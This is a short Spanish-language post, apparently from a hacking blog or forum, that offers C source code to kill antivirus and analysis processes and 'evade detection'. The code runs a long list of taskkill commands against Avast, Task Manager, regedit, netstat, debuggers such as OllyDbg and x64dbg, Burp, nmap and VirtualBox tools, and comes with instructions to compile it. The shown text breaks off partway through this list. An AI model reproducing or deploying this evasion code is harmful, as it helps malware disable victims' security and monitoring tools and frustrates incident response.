Matar Procesos ANTi-VIRUS
Aqui un programita en c++ para matar los procesos de los anti virus y evadir la deteccion en algunos casos si se encuentra el proceso. codigo fuente: lo copiamos y lo pegamos en el editor de texto y lo guardamos como kill.c y luego lo compilamos con dev-c++ en windows o gcc #include <stdio.h> #include <windows.h> void killAll(){ //kill al av process! system("@echo off"); system("echo killing.."); system("taskkill /f /im vbox.exe"); system("taskkill /f /im VBoxTray.exe"); system("taskkill /f /im avast.exe"); system("taskkill /f /im taskmgr.exe"); system("taskkill /f /im netstat.exe"); system("taskkill /f /im OLLYDBG.EXE"); system("taskkill /f /im x64DBG.exe"); system("taskkill /f /im nmap.exe"); system("taskkill /f /im burp.exe"); system("taskkill /f /im regedit.exe"); system("taskkill /f /im avast_install.exe"); system("taskkill /f /...